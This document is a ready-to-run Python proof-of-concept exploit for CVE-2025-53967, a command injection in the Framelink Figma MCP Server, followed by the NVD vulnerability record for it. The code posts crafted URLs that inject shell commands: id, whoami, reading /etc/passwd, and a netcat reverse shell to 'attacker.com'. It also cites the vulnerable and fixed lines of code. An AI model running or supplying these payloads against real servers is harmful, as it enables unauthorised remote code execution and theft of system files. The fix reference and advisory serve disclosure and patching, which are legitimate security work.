CVE-2025-53967

# CVE-2025-53967 - Framelink Figma MCP Server RCE PoC # Vulnerability: Command Injection via fetchWithRetry curl command # Affected: Figma-Context-MCP < v0.6.3 import requests # Target MCP server endpoint TARGET_URL = "http://target-mcp-server:3000/fetch" # Malicious payload with shell metacharacters for command injection # The injected command creates a reverse shell or executes arbitrary OS commands PAYLOAD = { "url": "http://example.com/api/$(id > /tmp/pwned.txt)", "retryCount": 3 } # Alternative payloads using different injection techniques PAYLOAD_BACKTICK = { "url": "http://example.com/`whoami > /tmp/pwned.txt`", "retryCount": 3 } PAYLOAD_SEMICOLON = { "url": "http://example.com/; cat /etc/passwd > /tmp/pwned.txt", "retryCount": 3 } PAYLOAD_PIPE = { "url": "http://example.com/ | nc attacker.com 4444 -e /bin/sh", "retryCount": 3 } def exploit(target_url, payload): """ Send crafted HTTP POST request to trigger command injection in fetchWithRetry function's curl command. """ headers = { "Content-Type": "application/json", "Accept": "application/json" } try: response = requests.post( target_url, json=payload, headers=headers, timeout=10 ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text[:500]}") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print(f"[*] Targeting: {TARGET_URL}") print("[*] Sending command injection payload...") exploit(TARGET_URL, PAYLOAD) print("[*] Check /tmp/pwned.txt on target for command execution evidence") # Vulnerable code reference (fetch-with-retry.ts): # const { stdout } = await execAsync(`curl -s -f "${url}"`); // VULNERABLE - no sanitization # # Fixed in v0.6.3: # const { stdout } = await execAsync(`curl -s -f ${JSON.stringify(url)}`); // FIXED - proper escaping

{"cve": {"id": "CVE-2025-53967", "sourceIdentifier": "[email protected]", "published": "2025-10-08T17:15:34.507", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Framelink Figma MCP Server before 0.6.3 allows an unauthenticated remote attacker to execute arbitrary operating system commands via a crafted HTTP POST request with shell metacharacters in input that is used by a fetchWithRetry curl command. The vulnerable endpoint fails to properly sanitize user-supplied input, enabling the attacker to inject malicious commands that are executed with the privileges of the MCP process. Exploitation requires network access to the MCP interface."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-420"}]}], "references": [{"url": "https://github.com/GLips/Figma-Context-MCP/blob/96b3852669c5eed65e4a6e20406c25504d9196f2/src/utils/fetch-with-retry.ts#L34", "source": "[email protected]"}, {"url": "https://github.com/GLips/Figma-Context-MCP/releases/tag/v0.6.3", "source": "[email protected]"}, {"url": "https://www.imperva.com/blog/another-critical-rce-discovered-in-a-popular-mcp-server/", "source": "[email protected]"}]}}